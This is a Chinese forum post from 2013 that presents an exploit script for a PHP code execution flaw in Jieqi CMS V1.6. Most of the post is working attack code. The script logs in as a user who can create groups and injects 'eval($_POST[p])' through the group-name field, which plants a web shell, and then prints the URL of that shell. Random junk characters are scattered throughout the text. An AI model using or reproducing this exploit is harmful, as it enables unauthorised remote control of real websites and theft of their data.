找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2301|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。2 L4 F" @1 S, C0 S

8 J8 w$ q/ W6 I8 O $ c) W) E3 z% k! J2 {3 W
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。2 u. I1 ?* e1 C) ?8 \$ |% z
需要有一个能创建圈子的用户。
6 \; h, [" _4 B5 {   d  p$ \* ^; C. {
<?php
+ j  `" O9 w: W) U6 W/ |1 O # }( _! ]% K6 B$ w  R. f
print_r('& P& f( J) k2 \2 k# h; V+ I+ H
+---------------------------------------------------------------------------+4 V1 u1 |6 G- x) P/ }2 ]' [6 n
Jieqi CMS V1.6 PHP Code Injection Exploit$ x- F* }) N4 z" }0 B0 q. [
by flyh4t, N* O1 M2 j( \# R
mail: phpsec at hotmail dot com/ W' J: X" z" u2 n9 H
team: http://www.wolvez.org* D0 b4 n& I7 `5 M! b6 L
+---------------------------------------------------------------------------+
' }" D% G' ^; w, E9 }* b/ D, r& u'); /**/ C5 H1 G& {  @% I& u4 F/ J7 R" j7 o8 }
* works regardless of php.ini settings
6 q+ S: F  V  S: f$ R' c*/ if ($argc < 5) { print_r('6 Z$ J# O6 S6 }0 K; y0 p7 C
+---------------------------------------------------------------------------+
4 _$ T& u4 F* X" rUsage: php '.$argv[0].' host path username
$ H3 n' j- F/ h; Yhost:      target server (ip/hostname)
$ i1 U' {1 o" a; P  Wpath:      path to jieqicms
& v/ `$ A; ^7 U# u. w( Duasename:  a username who can create group; b: f: n* J4 h1 O/ T9 @; r4 h. E/ t
Example:3 H" V2 _4 l8 e+ v( t# Q
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
4 X' X/ H$ s7 P9 `) o9 V0 h+---------------------------------------------------------------------------+" O0 e1 V) a2 a' o8 {) M' C1 b
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961) H5 D8 x$ R) ~) r3 U/ Y
Content-Disposition: form-data; name="gname"
5 C4 f4 z2 L1 R; d; y0 Q/ {
! W; I. U/ ]* ~/ I4 E'; $params .="';"; $params .='eval($_POST[p]);//flyh4t8 x* k& n8 V/ O8 ]* ^
-----------------------------23281168279961; D! w$ t# c: I5 n! \4 h3 M) m
Content-Disposition: form-data; name="gcatid"# \+ O: U2 R  ?. Y- f
) G/ \$ e) I# E, K6 u. M4 N
1- d( [/ H- @# a# O
-----------------------------23281168279961
; G. `0 l7 P# wContent-Disposition: form-data; name="gaudit"
7 F) S0 N' Y6 W' k1 y
& L& `' V* k+ O+ n, n( B7 ?4 G1
& A% Y) p- l6 L8 Z$ U7 Q2 y3 F-----------------------------23281168279961# h3 H" @6 @0 u
Content-Disposition: form-data; name="gbrief"# E2 d2 `# ]( o9 S
9 O) u) }+ _5 U1 b
1) d3 e- K8 ~( R/ O
-----------------------------23281168279961--- L" F1 t) r7 h5 b
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com0 j8 V$ t; `! b: Q7 k- A& m
9 _3 c; v" m: N: E
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表